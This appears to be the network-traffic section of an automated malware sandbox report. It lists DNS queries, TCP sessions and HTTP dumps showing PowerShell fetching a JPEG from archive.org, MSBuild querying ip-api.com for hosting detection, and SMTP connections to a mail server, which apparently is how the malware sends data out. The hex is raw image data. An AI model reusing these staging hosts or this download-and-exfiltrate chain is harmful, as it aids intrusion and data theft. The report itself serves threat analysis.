                                                                                      Mar 23, 2025 21:49:04.103507996 CET44349723172.66.0.235192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.103604078 CET44349723172.66.0.235192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.103797913 CET49723443192.168.2.4172.66.0.235
                                                                                      Mar 23, 2025 21:49:04.103797913 CET49723443192.168.2.4172.66.0.235
                                                                                      Mar 23, 2025 21:49:04.103878975 CET44349723172.66.0.235192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.103925943 CET44349723172.66.0.235192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.103996038 CET49723443192.168.2.4172.66.0.235
                                                                                      Mar 23, 2025 21:49:04.110569954 CET49723443192.168.2.4172.66.0.235
                                                                                      Mar 23, 2025 21:49:04.601294994 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:04.695979118 CET8049724208.95.112.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.696094036 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:04.697465897 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:04.792952061 CET8049724208.95.112.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.846493959 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:05.737155914 CET4968180192.168.2.42.17.190.73
                                                                                      Mar 23, 2025 21:49:05.996166945 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.181262970 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.181354046 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.252747059 CET49680443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:49:06.609875917 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.610153913 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.795133114 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.795449018 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:06.981169939 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:06.987845898 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.183367968 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.183427095 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.183463097 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.183475971 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.215440035 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.401406050 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.417431116 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.605463982 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.606479883 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.793252945 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.793581009 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:07.985965967 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:07.986218929 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.170986891 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.171178102 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.358836889 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.359025002 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.533993959 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:49:08.546375990 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.546899080 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.546941042 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.546976089 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.547002077 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.731591940 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.731620073 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.731637001 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.731654882 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.735472918 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.750617027 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.937836885 CET58749725161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:08.940840960 CET49725587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:08.941977978 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.121869087 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.122005939 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.426950932 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.427094936 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.607383966 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.607556105 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.788827896 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.789285898 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.980288029 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.980340958 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.980360985 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:09.980509996 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:09.981775999 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.162087917 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.163218975 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.344337940 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.344600916 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.525366068 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.525769949 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.710099936 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.710364103 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:10.895131111 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:10.895493031 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.077600956 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.078119040 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258503914 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.258833885 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258861065 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258881092 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.258900881 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:11.438950062 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.439027071 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.439193964 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.439213991 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.441217899 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:49:11.487225056 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:49:15.346520901 CET4968180192.168.2.42.17.190.73
                                                                                      Mar 23, 2025 21:49:15.862169981 CET49680443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:49:55.472001076 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:55.568274975 CET8049724208.95.112.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:55.568485975 CET4972480192.168.2.4208.95.112.1
                                                                                      Mar 23, 2025 21:49:57.862473965 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:49:57.951841116 CET8049720142.251.40.227192.168.2.4
                                                                                      Mar 23, 2025 21:49:57.951914072 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:50:28.284317970 CET49708443192.168.2.452.113.196.254
                                                                                      Mar 23, 2025 21:50:45.487723112 CET49726587192.168.2.4161.97.124.96
                                                                                      Mar 23, 2025 21:50:45.668392897 CET58749726161.97.124.96192.168.2.4
                                                                                      Mar 23, 2025 21:50:45.669246912 CET49726587192.168.2.4161.97.124.96
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 23, 2025 21:48:54.398217916 CET6219453192.168.2.41.1.1.1
                                                                                      Mar 23, 2025 21:48:54.590472937 CET53621941.1.1.1192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.025158882 CET5801153192.168.2.41.1.1.1
                                                                                      Mar 23, 2025 21:48:57.123754978 CET53580111.1.1.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:02.731956959 CET5962753192.168.2.41.1.1.1
                                                                                      Mar 23, 2025 21:49:02.833312988 CET53596271.1.1.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:04.495019913 CET6524153192.168.2.41.1.1.1
                                                                                      Mar 23, 2025 21:49:04.593508959 CET53652411.1.1.1192.168.2.4
                                                                                      Mar 23, 2025 21:49:05.467026949 CET5547953192.168.2.41.1.1.1
                                                                                      Mar 23, 2025 21:49:05.994764090 CET53554791.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Mar 23, 2025 21:48:54.398217916 CET192.168.2.41.1.1.10x6a4dStandard query (0)ia600204.us.archive.orgA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:48:57.025158882 CET192.168.2.41.1.1.10x302Standard query (0)c.pki.googA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:02.731956959 CET192.168.2.41.1.1.10xc816Standard query (0)pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.devA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:04.495019913 CET192.168.2.41.1.1.10x412aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:05.467026949 CET192.168.2.41.1.1.10x9d38Standard query (0)mail.detarcoopmedical.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Mar 23, 2025 21:48:54.590472937 CET1.1.1.1192.168.2.40x6a4dNo error (0)ia600204.us.archive.org207.241.227.224A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:48:56.833044052 CET1.1.1.1192.168.2.40xcc03No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:48:56.833044052 CET1.1.1.1192.168.2.40xcc03No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:48:57.123754978 CET1.1.1.1192.168.2.40x302No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2025 21:48:57.123754978 CET1.1.1.1192.168.2.40x302No error (0)pki-goog.l.google.com142.251.40.227A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:02.833312988 CET1.1.1.1192.168.2.40xc816No error (0)pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:02.833312988 CET1.1.1.1192.168.2.40xc816No error (0)pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:04.593508959 CET1.1.1.1192.168.2.40x412aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:05.994764090 CET1.1.1.1192.168.2.40x9d38No error (0)mail.detarcoopmedical.comdetarcoopmedical.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2025 21:49:05.994764090 CET1.1.1.1192.168.2.40x9d38No error (0)detarcoopmedical.com161.97.124.96A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • ia600204.us.archive.org
                                                                                      • pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                                                                                      • c.pki.goog
                                                                                      • ip-api.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      0192.168.2.449720142.251.40.22780
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 23, 2025 21:48:57.214001894 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                                                      Cache-Control: max-age = 3000
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: c.pki.goog
                                                                                      Mar 23, 2025 21:48:57.306162119 CET223INHTTP/1.1 304 Not Modified
                                                                                      Date: Sun, 23 Mar 2025 20:03:27 GMT
                                                                                      Expires: Sun, 23 Mar 2025 20:53:27 GMT
                                                                                      Age: 2730
                                                                                      Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                      Cache-Control: public, max-age=3000
                                                                                      Vary: Accept-Encoding
                                                                                      Mar 23, 2025 21:48:57.313484907 CET200OUTGET /r/r4.crl HTTP/1.1
                                                                                      Cache-Control: max-age = 3000
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: c.pki.goog
                                                                                      Mar 23, 2025 21:48:57.404122114 CET223INHTTP/1.1 304 Not Modified
                                                                                      Date: Sun, 23 Mar 2025 20:03:30 GMT
                                                                                      Expires: Sun, 23 Mar 2025 20:53:30 GMT
                                                                                      Age: 2727
                                                                                      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                      Cache-Control: public, max-age=3000
                                                                                      Vary: Accept-Encoding


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449724208.95.112.1803028C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 23, 2025 21:49:04.697465897 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                      Host: ip-api.com
                                                                                      Connection: Keep-Alive
                                                                                      Mar 23, 2025 21:49:04.792952061 CET175INHTTP/1.1 200 OK
                                                                                      Date: Sun, 23 Mar 2025 20:49:04 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 6
                                                                                      Access-Control-Allow-Origin: *
                                                                                      X-Ttl: 60
                                                                                      X-Rl: 44
                                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                                      Data Ascii: false


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449716207.241.227.2244438188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-03-23 20:48:55 UTC114OUTGET /25/items/new_image_20250318/new_image.jpg HTTP/1.1
                                                                                      Host: ia600204.us.archive.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-03-23 20:48:55 UTC582INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.24.0
                                                                                      Date: Sun, 23 Mar 2025 20:48:55 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 3268007
                                                                                      Last-Modified: Tue, 18 Mar 2025 13:44:02 GMT
                                                                                      Connection: close
                                                                                      ETag: "67d978a2-31dda7"
                                                                                      Strict-Transport-Security: max-age=15724800
                                                                                      Expires: Mon, 24 Mar 2025 02:48:55 GMT
                                                                                      Cache-Control: max-age=21600
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Accept-Ranges: bytes
                                                                                      2025-03-23 20:48:55 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 fc 02 cb 12 a2 02 fb 3c
                                                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222p"<
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: d8 ae 9c 2e 64 67 59 cc d6 74 21 94 d7 6e 02 e2 c9 2c 22 f7 f3 d2 36 39 ea 13 25 88 d6 51 65 5a 2d bd f8 ee df d0 7a bf 25 ad eb f5 ff 00 7b f9 a7 53 f7 9f cf ff 00 45 fa 5e 7c bf 98 ba e2 5c 92 dd 33 46 b1 4b 00 b0 5a a9 6d b6 fe 93 f3 3b b7 d5 e4 dc ba ca 6e 4e 4d 49 31 2e b3 9c ad a8 88 b2 c4 ac ed 64 a1 9f 47 14 c9 a3 33 59 91 52 19 24 95 02 89 b8 3d 9e 4c 5a b1 64 44 5b 28 82 46 8d 55 45 b2 54 58 8b 22 ad 85 42 4b ac 2b 52 52 5e 96 39 4b 21 2e 52 dc 8b 60 5b b3 8a c4 4a 12 a2 4d 08 08 b2 25 44 a0 20 01 62 0a 48 00 02 81 56 20 05 84 00 28 0d 77 f3 0b 05 04 d7 d0 f9 c5 80 2a 49 02 80 40 00 00 01 60 a8 05 22 88 02 c2 80 00 35 35 9d e4 25 2c 01 0a 22 88 0a 51 9d 40 a2 54 3a 62 e4 35 90 00 0d 0c 80 50 01 69 02 c5 25 09 6e 42 88 05 cd 16 82 54 96 ca 54 2c
                                                                                      Data Ascii: .dgYt!n,"69%QeZ-z%{SE^|\3FKZm;nNMI1.dG3YR$=LZdD[(FUETX"BK+RR^9K!.R`[JM%D bHV (w*I@`"55%,"Q@T:b5Pi%nBTT,
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 6e 7a 62 4b ae 56 4f 48 e9 d3 96 6b 39 cc bc f1 cf 5d 26 22 67 7d 53 86 1a 8c 6d 33 99 26 d3 9f b3 c7 9c e7 d1 c8 59 35 2a 2c 16 24 d6 ac d6 b2 21 ec f2 2d d5 cc b7 59 d6 4d f2 b9 99 2a 49 2c 35 90 94 93 34 82 52 d9 6d a9 99 04 48 6a 33 9d 49 2d cd 33 9d 49 32 b3 32 eb 2a b4 b5 65 14 b6 4d e6 13 af 24 ca c9 00 5d 74 ae 36 52 5a 5c ac 4d f3 d0 ca c8 b1 a2 20 14 b7 30 42 01 2e b0 11 49 60 50 35 6b 0b 0d 6b 3b d6 ff 00 4f e8 df a3 7a fc 37 3e 98 c6 73 9d 67 18 00 20 00 45 14 8a 14 80 58 3a 66 cd 61 42 54 2d ce eb a7 3f dc 7e 2d 9e 53 46 a5 49 2a 5a 20 50 20 5d 40 b6 b3 3a db 38 db 9c dd 26 c9 8d 0b ed f0 ac f4 f9 a0 ba cd 25 21 72 ae 99 9b 4c 29 5a 9b b3 0b a2 5c 53 d1 e6 b6 cb bc 68 de b8 dd 4f 4e 79 5b 9e ac ab b7 1e be 63 59 4c d6 52 56 f0 37 9b 93 7a ce
                                                                                      Data Ascii: nzbKVOHk9]&"g}Sm3&Y5*,$!-YM*I,54RmHj3I-3I22*eM$]t6RZ\M 0B.I`P5kk;Oz7>sg EX:faBT-?~-SFI*Z P ]@:8&%!rL)Z\ShONy[cYLRV7z
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 95 79 f5 0c 38 73 cb bf bb cd 75 af 77 2d 3a 5e 58 a9 79 cd 4c ce 6b 4d 62 ea eb bc f4 f4 de bc 9d ba f1 de b9 3d 5c cf 3b af 39 71 ac f5 8d 5e 1d ad e3 be 7e 8b 5c bd 38 ba 9f 43 c1 f4 35 7a 76 f1 fb b3 cf db be 39 e3 cb d7 d3 e2 d9 7d 5e 0d f2 ef d7 af 4f 34 6b df df e7 f2 cc fb 3f 25 e1 ba e9 e8 f9 9e fe 9d 7e 87 ab e6 f3 e7 cb e8 f9 27 85 ae 7c 37 3b 7a 3a fa 78 fb 66 7a 71 d7 9f 18 e5 c7 d3 e4 df 5e 93 a7 80 d5 f3 ce 79 f7 f4 f9 bd 35 ae 9c 77 e7 ce 75 df c9 ae 5c bd 3f 33 d3 e1 e5 ca e2 e7 8f 2b bc 8e ee 5d f7 be 17 a7 b0 f1 6b 8f bf 5a e7 ac 7b 3b 76 f3 f2 f6 fc fc e7 7d 7c f6 18 cc c7 3e bd f8 f5 d6 f5 e8 e7 eb ef df a7 2e 5c f7 be d3 cb 39 f3 e8 c4 ce 77 df cf 86 bd 7e 5e 98 4e 5c 7b 71 e3 c7 5a e6 93 dd db e7 ce bd 3d 7e 0d 73 e5 c9 9c e7 97 35
                                                                                      Data Ascii: y8suw-:^XyLkMb=\;9q^~\8C5zv9}^O4k?%~'|7;z:xfzq^y5wu\?3+]kZ{;v}|>.\9w~^N\{qZ=~s5
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 1d 64 57 6a 99 e7 aa d6 f8 6e cd ee e3 53 b7 a7 86 f7 3d 1e 1f 6f 9c 71 e9 b9 70 68 e5 35 57 3c fa 49 6e 37 6d db 3e ed de 3e 7f 4f 2b 75 c1 df 37 9f 69 2e bb f9 ba 75 de f6 d7 ab a6 ba 7d 2f 95 f4 73 9f 27 c9 fb 7f 27 5d 3c 18 f5 79 39 ef 8b d3 ac 3c fd 74 d5 be de 1e ee bd b9 7c ef a1 e4 5e 59 df 0e 3c f9 ce 99 e5 8e 53 d1 c7 32 6f af 3a 8d e5 79 f7 cf 45 98 bd 75 ae 59 f7 f8 e4 e7 ad 4c ce 37 d1 94 79 ec ce 5b e7 b8 c6 6c 92 cb 10 74 5e 2d 63 39 e9 88 1a ce 86 f1 ec b7 cd d3 e9 fa b5 7f 39 bc e2 4f 47 9f 0c 62 a5 89 2a 90 85 4a d6 5a 89 1a a9 60 25 2c 48 fa 6f 9b 28 59 22 6c ca 0b e9 f2 d9 02 d5 94 4d 65 35 71 56 11 28 12 88 a3 2a 81 4c 96 93 48 8b 92 c0 b0 2d 82 cb 0b 10 2e ab 2e fc 8c 92 2c 51 00 95 0b 14 42 92 4b 02 e6 c2 c0 58 0b 02 58 10 d4 00 02
                                                                                      Data Ascii: dWjnS=oqph5W<In7m>>O+u7i.u}/s'']<y9<t|^Y<S2o:yEuYL7y[lt^-c99OGb*JZ`%,Ho(Y"lMe5qV(*LH-..,QBKXX
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: c6 e5 6e 83 79 85 30 a9 8a 4e a9 19 54 bb 77 10 c8 3b ea ed fc 01 87 9c 9d 02 e9 7a fa 9d 1b 5e f3 51 da 73 9d 38 ac fa 95 57 17 29 85 90 8a cb 53 89 2b 20 8d 1c 00 d3 64 1d 1a 73 a7 3f cb 12 d8 92 b1 a6 fa 6d f0 ed e1 1a 15 b9 d8 ce ae a4 f6 35 70 db 2d a1 55 94 fe 02 db 56 fe 3d b3 66 85 0f 94 7e 04 6a c6 1a af ea ba 47 f4 8f fe 87 8a 35 ea 74 ef a9 51 d5 5f e2 62 7f be 00 9f 06 8b 9d d5 74 8e e9 0f e0 b6 93 de 35 92 7f 3c ff 00 a6 0a 8f ea cf a5 d3 73 f1 1d 25 4e 14 04 7c 77 f0 21 46 14 a8 42 66 32 a9 d2 35 2a 3d 8e 63 c4 85 02 e0 a7 1b 05 c2 b6 1a 77 60 a6 e6 3d d2 00 94 4a c3 54 12 59 4e a2 a8 fb aa 34 c3 9c eb aa 12 49 7b 61 84 63 85 de a9 d9 b0 80 fb 02 84 48 b5 65 6c b6 12 82 08 87 2b 17 f1 53 1a d2 b0 d5 75 9d e3 ad 1e d5 f6 90 13 81 9d 27 c8 78
                                                                                      Data Ascii: ny0NTw;z^Qs8W)S+ ds?m5p-UV=f~jG5tQ_bt5<s%N|w!FBf25*=cw`=JTYN4I{acHel+Su'x
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 55 1a 9d ba 4d 10 9b ea 4d 4b 9c 1c e9 87 55 52 af 24 ff 00 2b 93 5d 21 d5 25 b3 71 70 b5 ee fa f7 6e 54 fe d6 90 6a 16 a2 60 ce 4b 48 57 00 ad b8 f3 ba 2e 96 9f aa 0d c2 e7 9a 3d 3b ab d4 ab 45 d4 6a 91 07 2a e3 1c 68 35 84 5b af 1c 7c 07 6e 27 43 e5 c7 1f 00 0b 9e 34 68 47 7b 14 65 c6 74 b4 94 d8 6a 75 aa 25 6c 83 4b dd 5e 83 fa 77 29 d2 54 e1 65 4a fe 24 e7 90 8e 9c 6a d8 3e 11 9f 0e 34 db 4d bc 86 0f ce 14 98 d4 20 61 0a a5 a1 c5 73 f8 8c 61 7b ba 9e 92 a7 4a ef ce 2e 2e 53 8f eb ef 36 7f 41 c0 6e 2c 9d 68 d7 a9 41 cf 79 a8 ff 00 c0 e0 02 74 22 02 26 74 9c 78 14 23 5f e2 82 6d 42 c7 12 a1 73 3a cc 83 b7 6e 5b 0a 06 a3 5c 47 3e 7b ae 16 5d af 0a 57 1c f2 bf 8e eb 33 32 83 6a 5b 32 3d 6c 11 01 d2 84 4f f2 6b 49 0d 22 00 ce ea 9e 49 18 74 94 1f 2d 9c 5e
                                                                                      Data Ascii: UMMKUR$+]!%qpnTj`KHW.=;Ej*h5[|n'C4hG{etju%lK^w)TeJ$j>4M asa{J..S6An,hAyt"&tx#_mBs:n[\G>{]W32j[2=lOkI"It-^
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: 18 6c b7 c5 ae b7 fb ae 74 e4 26 99 54 3a da 0c e9 7a ba ad a9 d4 1d e0 db e5 b6 b1 81 10 d6 dd a7 1b 1c 85 33 a4 e9 42 a0 a2 e3 a0 db 9d 25 31 e5 88 7a 92 57 0a 34 aa da 30 a1 6c b1 a4 2c 47 13 e1 09 a0 ca 7e 49 10 4a 8c 46 bb 69 38 0d d0 a1 84 26 d4 03 8b 9b 2d 5b 3a 93 ae ab 5e 4b de ec f2 f3 0c 69 54 da 1c ff 00 e4 08 7a 92 5f 51 f2 eb 0b cc 4a a3 57 d8 be 49 ca b7 2e 30 ae 59 57 5a 5e f8 6d d9 98 26 a3 61 d1 2d 78 80 40 6d d0 7f 91 64 a0 cf 56 c8 39 69 2f b9 5c 99 82 f3 a3 9b 92 2d 42 d7 b1 de ae 85 1a 4c 89 c9 09 9b 22 df 62 44 fd 4c 94 d4 13 a6 09 f5 99 5c 80 22 30 47 ac a0 41 7d 57 31 d5 5a e6 b9 6e e1 b8 c1 dc 98 27 63 71 0a 1c d0 3e c0 4b 9e e2 f0 cc ac 97 7a 93 09 e0 26 a2 03 58 d5 4d f0 6a 19 2e 6b 42 92 04 85 4f 7a c5 a0 16 bf b6 c9 47 ec 55
                                                                                      Data Ascii: lt&T:z3B%1zW40l,G~IJFi8&-[:^KiTz_QJWI.0YWZ^m&a-x@mdV9i/\-BL"bDL\"0GA}W1Zn'cq>Kz&XMj.kBOzGU
